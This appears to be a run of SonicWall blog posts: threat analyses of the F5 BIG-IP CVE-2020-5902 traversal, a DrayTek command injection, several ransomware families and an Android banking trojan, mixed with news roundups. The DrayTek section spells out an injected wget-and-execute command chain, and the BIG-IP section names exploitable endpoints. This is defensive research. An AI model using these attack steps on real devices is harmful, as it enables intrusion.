CVE-2020-5902: Hackers actively exploit critical Vulnerability in F5 BIG-IP

BIG-IP

F5’s BIG-IP is a product family comprises software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI for F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability | CVE-2020-5902

BIG-IP Web GUI is accessible over HTTPS on port 443/TCP via the following URL: https://<BIG-IP server>/tmui/login.jsp

A directory traversal vulnerability exists in the F5 BIG-IP product family. This is due to insufficient validation of the URI within the HTTP requests. By using a semicolon in URI, a remote attacker can bypass the access control policy set up on Apache and forward the malicious URI to the Tomcat backend server. When Tomcat normalizes the URI, any string followed by a semicolon will be ignored. The root cause of the vulnerability is how Apache and Tomcat parse the URL differently, allowing users to bypass the authentication and invoke JSP modules. Successful exploitation allows unauthenticated remote attackers to access the internal java binaries on the vulnerable server.

The following internal JSP files are wildly used to compromise:

/tmui/tmui/locallb/workspace/tmshCmd.jsp
/tmui/tmui/locallb/workspace/fileRead.jsp
/tmui/tmui/locallb/workspace/fileWrite.jsp

Exploit:

We observe the below http exploit requests targeting F5 BIG-IP servers vulnerable to CVE-2020-5902.

Impact:

A quick search on Shodan reveals more than 6000 BIG-IP servers exposed publicly over the internet. Over 2000 of those servers seem vulnerable to CVE-2020-5902.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15070 F5 BIG-IP TMUI Remote Command Execution

Affected Products:

BIG-IP versions 11.6.1 – 11.6.5, 12.1.0 – 12.1.5,  13.1.0 – 13.1.3, 14.1.0 – 14.1.2, 15.1.0 and 15.0.0 – 15.0.1 are affected by this vulnerability.

Find vendor advisory here

IOC:

Attacker IP’s:

195.54.160.115
207.180.201.51
222.172.157.32
172.31.48.102
222.172.229.58
182.245.198.246
172.105.149.194
27.115.124.75
27.115.124.10
111.206.250.198
27.115.124.74
182.245.199.208
111.206.250.235
111.206.250.230
64.39.99.67
157.43.37.216
49.206.2.81
111.206.250.236
111.206.250.229
115.236.45.236
115.238.89.37
111.206.250.197
27.115.124.9
180.169.87.53
61.166.216.165

Cybersecurity News & Trends

This week, ransomware attacks on U.S. governments, the energy sector, sports teams and smartwatch maker Garmin made headlines — and with cryptocurrency on the rise, more may be in store.


SonicWall Spotlight

Malware is Down, But IoT and Ransomware Attacks Are Up — TechRepublic

  • Malicious attacks disguised as Microsoft Office files increased 176%, according to SonicWall’s midyear threat report.

Sharp Spike in Ransomware in U.S. as Pandemic Inspires Attackers — ThreatPost

  • COVID-19 has changed the face of cybercrime, as the latest malware statistics show.

Inactive wear! Smartwatch maker Garmin suffers widespread outages after ‘ransomware attack’ – leaving thousands unable to track their workouts — Daily Mail

  • According to Bill Conner, the combination of remote internet connections and less secure personal computers has increased organizations’ risk of being compromised.

Smartwatch maker Garmin suffers outage after ransomware attack — The Telegraph

  • SonicWall found that there had been a 20% increase in the number of ransomware attacks in the first half of the year, to more than 120 million.

HoJin Kim Named as part of CRN‘s Top 100 Executives Of 2020 list, we highlight 25 sales executives leading the channel charge — CRN Award

  • Kim has revolutionized pricing for MSSPs, with a pay-as-you-go model for SonicWall’s software products that delivers a cost savings of 20% over buying an annual license.

Cybersecurity News

FBI warns of Netwalker ransomware targeting US government and orgs — Bleeping Computer

  • The FBI has issued a security alert about Netwalker ransomware operators, advising victims not to pay the ransom and to report incidents to their local FBI field offices.

Russia’s GRU Hackers Hit US Government and Energy Targets — Wired

  • A previously unreported Fancy Bear campaign persisted for well over a year — suggesting the notorious group behind the attacks has broadened its focus.

UK govt warns of ransomware, BEC attacks against sports sector — Bleeping Computer

  • The UK National Cyber Security Centre has highlighted the increasing number of ransomware, phishing and BEC schemes targeting sports organizations.

Bitcoin rises above $10,000 for first time since early June — Reuters

  • After several weeks of trading in narrow ranges, Bitcoin has breached $10,000 for the first time since early June.

Feature-rich Ensiko malware can encrypt, targets Windows, macOS, Linux — Bleeping Computer

  • Threat researchers have found a new feature-rich malware that can encrypt files on any system running PHP.

CISO concern grows as ransomware plague hits close to home — ZDNet

  • An increasing wave of cybercrime targeting Fortune 500 companies is starting to ring alarm bells.

BootHole GRUB bootloader bug lets hackers hide malware in Linux, Windows — Bleeping Computer

  • When properly exploited, a severe vulnerability in almost all signed versions of GRUB2 bootloader could enable compromise of an operating system’s booting process even if the Secure Boot verification mechanism is active.

OkCupid: Hackers want your data, not a relationship — ZDNet

  • Researchers have discovered a way to steal the personal and sensitive data of users on the popular dating app.

US defense contractors targeted by North Korean phishing attacks — Bleeping Computer

  • Employees of U.S. defense and aerospace contractors were targeted in a large-scale spearphishing campaign designed to infect their devices and to exfiltrate defense tech intelligence.

In Case You Missed It

Exorcist ransomware casts triple punishment for non-payment. CIS countries spared.

The SonicWall Capture Labs threat research team have observed reports of new ransomware named Exorcist.  It is reported to have surfaced over the past week on an underground Russian forum using the ransomware-as-a-service (RaaS) model with 30% commission retained by the creator.  The initial cost of file retrieval is $500 USD (in Bitcoin) but, increases by a factor of 3 if payment is not made within 48 hours.

 

Infection Cycle:

 

Upon infection, files on the system are encrypted and given a random six character ([A-Z][a-z]) extension eg. “.GyQUfe”.  The following image is displayed on the desktop background:

 

The malware drops the following files onto the system:

  • %APPDATA%\Local\Temp\boot.sys (0 bytes)
  • %APPDATA%\Local\Temp\msdt (0 bytes)
  • %APPDATA%\Local\Temp\d.bmp
  • GyQUfe-decrypt.hta (all dirs containing encrypted files)

 

d.bmp contains the image that is displayed on the desktop background.

 

GyQUfe-decrypt.hta contains the following message:

 

hxxp://217.8.117.26/pay and hxxp://4dnd3utjsmm2zcsb.onion/pay lead to the following pages:

 

The infection is reported to the same webserver (217.8.117.26) along with encrypted information:

 

Disassembling the code reveals the ability to disable various system recovery methods:

 

It also contains a list of processes to kill so that any related important files are no longer held exclusively open by such processes and can thus be encrypted:

 

Before infection, the malware performs a check to avoid encrypting systems in CIS (Commonwealth of Independent States) countries:

 

The malware states that the ransom fee will be tripled if payment is not made on time.  We confirmed this after checking back a few days later:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Exorcist.RSM_2 (Trojan)
  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

SonicWall SMA Added to the Department of Defense Approved Products List

Building on our history of partnering with the federal government on cybersecurity initiatives, SonicWall is pleased to announce that the SonicWall Secure Mobile Access (SMA) Series 6210 and 7210 have been added to the U.S. Department of Defense Information Network (DoDIN) Approved Products List (APL) — previously known as UC APL — as  “Virtual Private Network Concentrators (VPN).” The DoDIN APL is made up of products that have completed federal Cybersecurity and Interoperability Certification — an involved, 37-step testing process for products that affect communication and collaboration across the DoDIN. The list is used as an acquisition support tool for DoD organizations interested in purchasing equipment to support their mission.

DoDIN operations underpin nearly every aspect of military operations, and the Department of Defense relies on a protected DoDIN to coordinate sustainment of forces. The DoDIN is made up of all of DoD cyberspace, including both classified and unclassified networks, DoD-owned smartphones, RFID tags, industrial control systems, and the hardware and software that involves the mission performance of systems, including weapon systems. Nearly every military and civilian employee of DoD uses the DoDIN to accomplish some portion of their mission or duties, making its protection crucial to national security.

As a result of the ongoing COVID-19 pandemic, organizations are increasingly looking for ways to secure remote and mobile work, and the federal government is no exception. SonicWall SMA Series, a unified secure access gateway, enables anytime, anywhere and any device access to any application. The SMA Series’ granular access control policy engine, context-aware device authorization, application-level VPN and advanced authentication with single sign-on enable organizations to embrace BYOD and mobility in a hybrid IT environment.

SonicWall SMA Series is not the first SonicWall product to be part of the DoDIN APL. SonicWall NSA and SuperMassive 9000 series were added in November 2015, and in July 2016 they were joined by the SonicWall TZ Series firewall appliances. Both products were approved under the categories “Data Firewall” and “Intrusion Protection Systems and Intrusion Detection Systems.

SonicWall is proud of its tradition of protecting United States federal cybersecurity, and with the addition of the SMA Series to the DoDIN APL, SonicWall looks forward to carrying on this legacy in an expanded capacity.

To learn more about how SonicWall’s federal government-certified cybersecurity solutions, click here.

Cybersecurity News & Trends

This week, SonicWall reveals what the “new business normal” looks like for cybercriminals in the mid-year update to the 2020 Cyber Threat Report.


SonicWall Spotlight

SonicWall Report: COVID-19 Has Created ‘Boon’ For Criminals — ZDNet

  • In an article on SonicWall’s Mid-Year Threat Report, ZDNet highlights findings that hackers have shifted their strategies due to COVID-19.

The 2020 Rising Female Stars Of The IT Channel — CRN

  • SonicWall is proud to announce one of its own, Tiffany Haselhorst, has joined other leaders within the IT channel community on CRN’s esteemed 2020 list of 100 Rising Female Stars.

Cyberthreat landscape changes to meet new business normal of Work From Home: SonicWall — Channelbuzz.ca

  • In an article on SonicWall’s Mid-Year Threat Report, Channelbuzz highlights how cybercriminals have evolved their tactics to better exploit remote work environments during the pandemic.

Malware Attacks Down As Ransomware Increases — BetaNews

  • In an article on SonicWall’s Mid-Year Threat Report, BetaNews highlights findings that malware has dropped 24% and ransomware has increased 20% globally and 109% in the U.S.

Cybersecurity News

Using Robust Tools, Cybercriminals Accelerate Their Own Digital Transformation — SiliconANGLE

  • In the online underground, crime not only pays, but attackers are rapidly developing tools and networks that rival those of legitimate enterprises today.

Blackbaud Hack: Universities lose data to ransomware attack — BBC

  • At least seven universities in the UK and Canada have had student data stolen after hackers attacked a cloud computing provider.

Ongoing Meow attack has nuked >1,000 databases without telling anyone why — Ars Technica

  • Just hours after a world-readable database exposed a wealth of sensitive user information, UFO made the news again, this time because a database that stored user details was destroyed in an attack.

Apple’s Hackable iPhones Are Finally Here — Wired

  • Last year, Apple announced a special device just for hackers. The phone — for approved researchers only — will soon go into circulation.

New cryptojacking botnet uses SMB exploit to spread to Windows systems — Bleeping Computer

  • A new cryptojacking botnet is spreading across compromised networks via multiple methods that include the EternalBlue exploit for Windows Server Message Block (SMB) communication protocol.

Ransomware attack locked a football club’s turnstiles — ZDNet

  • Cyber criminals are targeting sports teams, leagues and organizational bodies — and in many cases, their attacks are successful, warns the NCSC.

Lazarus hackers deploy ransomware, steal data using MATA malware — Bleeping Computer

  • A recently discovered malware framework, known as MATA and linked to the North Korean-backed Lazarus hacking group, was used in attacks targeting corporate entities from multiple countries.

House-passed defense spending bill includes provision establishing White House cyber czar — The Hill

  • The House version of the annual National Defense Authorization Act included a provision establishing a national cyber director, a role that would help coordinate federal cybersecurity efforts.

Hackers use recycled backdoor to keep a hold on hacked e-commerce server — Ars Technica

  • Easy-to-miss script can give attackers new access should they ever be booted out.

Twitter Hack Revives Concerns Over Its Data Security — The Wall Street Journal

  • The alleged perpetrator, who called himself ‘Kirk,’ was part of a subculture where hackers trade in coveted social-media accounts.

In Case You Missed It

Draytek Vigor Remote Code Execution vulnerability attacks spotted in the wild

DrayTek is a manufacturer of broadband CPE (Customer Premises Equipment), including firewalls, VPN devices, routers and wireless LAN devices. Vigor3900/2960 is a Quad-WAN broadband router/VPN gateway product.Vigor300B is a Quad-WAN load balancing broadband router that runs on the linux system.

Command-injection vulnerabilities (CVE-2020-14472) exists in the mainfunction.cgi file in the Draytek Vigor3900, Vigor2960, and Vigor 300B devices before version 1.5.1.1 . This can lead to remote code execution.

Sonicwall Capture Labs threat research team has spotted attacks exploiting this vulnerability in the wild.

Following are some examples :

Decoding the urls

The discussion below provides an analysis of the attack:

IFS is Internal Field Separator that the shell treats each character of $IFS as a delimiter. If IFS is not set then the default  sequence  is<space>, <tab>, and <newline>. So, in above attack ${IFS} is <space>. This means the attack constitutes of following commands

/bin/sh -c this will launch bash and execute the command that follows.

cd /tmp; will change the directory to tmp.

rm rf arm7; will delete all the files named arm7.

busybox wget <attacker’s website>; this will download a malicious file(arm7) from attacker’s domain. BusyBox is a software suite that provides several Unix utilities in a single executable file. It runs in a variety of POSIX environments such as Linux, Android, and FreeBSD.

chmod 777 arm7; makes the file readable,writable and executable by everyone.

./arm7; executes the binary which is potentially malicious

A quick check on shodan reveals certain vulnerable devices

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15089:Draytek Vigor Remote Code Execution

IoCs
192.3.45.185
1.203.161.58
1.203.161.58
1.203.161.58
100.33.144.84
100.38.122.182
101.108.97.145
102.66.104.204
103.209.1.230
103.238.200.62
103.4.65.78
103.55.91.146
103.55.91.146
109.237.147.16
115.133.81.181
115.85.32.210
117.6.168.102
118.70.133.196
118.70.190.137
121.32.151.178
122.176.27.17
123.24.205.232
134.19.215.196
134.90.254.172
145.220.25.28

Reha ransomware targeting Arabic speaking countries.

The SonicWall Capture Labs threat research team observed reports of a new variant family of Reha ransomware [Reha.RSM] actively spreading in the wild.

The Reha ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

The ransomware targeting Arabic speaking countries and designed for very specific region.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. < .Try2Cry >
    • %App.path%\ [Name]. < .txt > recovery instruction

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files with following extensions and appends the [Try2Cry] extension onto each encrypted file’s filename.

*.doc,*.ppt,*.jpg,*.xls,*.pdf,*.docx,*.pptx,*.xlsx

During our analysis, we have noticed the malware using a packer called DNSgaurd to avoid detection by sandboxes in the wild.

This makes our jobs harder to create a Decryptor tool for this ransomware.

However with some dynamic techniques we were able to inject our tool into the ransomware process and extract some valuable data that proves this is a ransomware.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

Translated to English:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: REHA.RSM (Trojan)
  • GAV: Invader.H_176 (Trojan)
  • GAV: Pitit.A (Trojan)

 

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

New Cyber Threat Intelligence Finds Malicious Office Files Spiking, Ransomware Up during COVID-19 Pandemic

Explore the Mid-Year Update to the 2020 SonicWall Cyber Threat Report

With the arrival of the COVID-19 pandemic in the first half of 2020, cybersecurity entered uncharted territory. As organizations worked to connect and secure millions of new remote workers, opportunistic attackers began seizing on the distraction, confusion and lack of preparedness surrounding the pandemic.

We may know how we plan to respond to the “new business normal,” but how are cybercriminals responding? To find out, SonicWall Capture Labs threat researchers have been investigating, analyzing and exploring new threat trends, tactics, strategies and attacks.

“This latest cyber threat data shows that cybercriminals continue to morph their tactics to sway the odds in their favor during uncertain times,” said SonicWall President and CEO Bill Conner. “With everyone more remote and mobile than ever before, businesses are highly exposed and the cybercriminal industry is very aware of that.”

To shed some light on what cybercrime’s new business normal looks like, SonicWall Capture Labs threat researchers are sharing exclusive threat intelligence in the mid-year update to the 2020 SonicWall Cyber Threat Report.

Download the exclusive mid-year report to explore the stories, behaviors and trends that are helping shape our new IT reality from the ground up.

COVID-19 the perfect backdrop for chaos.

SonicWall Capture Labs threat researchers found no shortage of cybercriminals leveraging the fear and uncertainty around the COVID-19 pandemic to get the upper hand. COVID-19 sparked malware across all continents in March, pushing the chance an organization would see a malware attack above 35%. SonicWall began seeing attacks, scams and exploits specifically based around COVID-19 on Feb. 4, and since then have detailed at least 20 different types of attacks across just about every category.

Malware volume dips again.

In 2019, fresh off the previous year’s all-time record high of 10.52 billion attacks, malware dropped 20%, to 4.8 billion malware attacks. Fortunately, during the first six months of 2020, that trend accelerated. SonicWall recorded 3.2 billion malware attacks in the first half of 2020, a 33% drop compared to the same time period last year.

Ransomware continues to climb.

As malware falls, ransomware appears to be taking up the slack. By comparing the first halves of 2019 and 2020 ransomware data, we see that not only is ransomware rising, it’s also rising faster.

Attacks against non-standard ports reach new highs.

For the first half of 2020, both Q1 and Q2 set records for number of attacks going through non-standard ports. In February, non-standard port attacks reached a record of 26% before climbing to an unprecedented 30% in May. The updated report explains why this is a critical issue for organizations.

Office files leveraged for malicious agenda.

In the first half of 2020, Office files and PDFs made up a third of all new malicious files identified by SonicWall Capture Advanced Threat Protection (ATP). What’s more concerning? Malicious Office files are up a staggering 176% this year.

Cryptojacking is alive and well.

After Coinhive closed in March 2019 and attacks plummeted in the second half of the year, the death of cryptojacking seemed imminent. But readily available alternatives and an increase in the value of cryptocurrencies have pushed cryptojacking in North America far above the levels recorded in the second half of 2019.

IoT attacks spike.

With a massive increase in the number of people working from home, criminals now have a potential back door to corporate networks through employees’ (often poorly secured) home IoT devices. Combined with an increase in the number of IoT devices in use and other factors, this has led to a huge increase in the number of IoT attacks.

SonicWall’s Tiffany Haselhorst Joins 2020 CRN 100 Rising Female Stars List

SonicWall is proud to announce one of its own, Tiffany Haselhorst, joins an esteemed list along with other leaders within the IT channel community. Today, CRN, a brand of The Channel Company, named her to its 2020 list of 100 Rising Female Stars.

“CRN’s 2020 100 Rising Female Stars list honors leaders who are poised to impact the industry for many years. They are accelerating the growth of their companies through excellent direction and innovation in their field,” said Blaine Raddon, CEO of The Channel Company. “The accomplishments of these women are reshaping the IT channel, and we are proud to honor their achievements.”

The 100 Rising Female Stars list is making its debut this year with channel leadership candidates selected by the CRN editorial team. The final honorees are chosen based on their demonstrated leadership, expertise, innovation and ongoing dedication to the IT channel.

This talented group of women contribute to the development and strategies of their organization’s channel partner programs and exude excellence in areas such as partner engagement, program management and marketing.

“Threat intelligence solutions have never been more vital for an organization’s online safety. I look forward to my continued work with partners to ensure they have the answers to the problems their customers seek to fix,” said Tiffany Haselhorst, Senior Sales Manager at SonicWall. “I’m honored to be recognized amongst so many of these women who I know work as equally hard to provide partners with the support, education and tools they need to exceed their goals and achieve success.”

SonicWall is home to the award-winning SecureFirst Partner program designed to help partners build a highly profitable security practice and offers a range of partnership tiers with varied requirements and associated benefits. It includes SonicWall University, a convenient online learning platform designed to help SecureFirst Partner sales representatives, sales engineers and support engineers stay at the forefront of today’s cyber threats and critical cybersecurity solutions.

The 2020 list of 100 Rising Female Stars will be featured in a special July issue of CRN Magazine and online at www.CRN.com/risingstars.

450+ Financial Android apps targeted by a multifaceted malware that uses Covid theme

SonicWall RTDMI engine recently detected an Android malware which pretends to look like a CoViD info app. It is an all in one malware which has functionalities of Banking Trojan, Spyware, Keylogger and Ransomware.

Non-existence of this malicious file at the time of detection on popular malware search portals like the VirusTotal and the Reversing Labs indicates the effectiveness of the RTDMI engine.

 

For an app which is circulated as a provider of CoViD Information, unwarranted permissions are requested which makes it suspicious:

                (permissions requested)

 

When the application is launched, a message to enable accessibility for “CovidSar2” is prompted continuously while malicious code is executed behind the scene. The app hides itself from the app list:

 

To evade detection from Google’s built-in malware protection, the app asks to disable Google Play Protect:

 

The app targets 457 applications by their package name. Targeted apps belong to banking, shopping, trading, finance & crypto wallet categories:

( Targeted package name Part1)

 

(Targeted package name Part2)

 

Technical Analysis:

Checking whether the app is running in a virtual environment:

 

The app hides its icon from the device which makes it difficult for the user to identify the app responsible for the activity:

 

Code to disable Google Play Protect:

 

It fetches installed application information from victim’s device which is later encrypted and sent to the C&C server “hxxps://tr3kjnf[.]xyz”:

 

It also has code which finds the app in the foreground, and accordingly gets an overlay page from the server:

 

Applications which use two-factor authentications for sign-in could possibly be compromised as it has the capability to read incoming messages including OTP:

 

The app has saved list of supported malicious commands in a locally saved configuration file named “set.xml”:

 

To fulfill the desired functionalities malware author has used the following commands:

del_sws: Delete incoming/outgoing messages:

 

gps: Sends victim’s location details:

 

getNumber: Reads contact numbers from phonebook:

 

spamSMS: Send spam SMS to numbers specified in the configuration file:

 

block_notification: Disable notifications from the specified package:

 

crypt / decrypt: Encrypts/decrypts a file with RC4 algorithm and adds/removes “.AnubisCrypt” extension:

 

htmllocker: Lock the screen and display ransom note:

 

findfiles: Searches files inside specific folder names and send them to the C&C server:

 

StartRecordSound: Taking recorded device audio with the current date and time in “.amr” extension:

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

 

Indicator of Compromise(IOC):

  • 04e16d09eec3a839506e7938516ca26b

 

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file: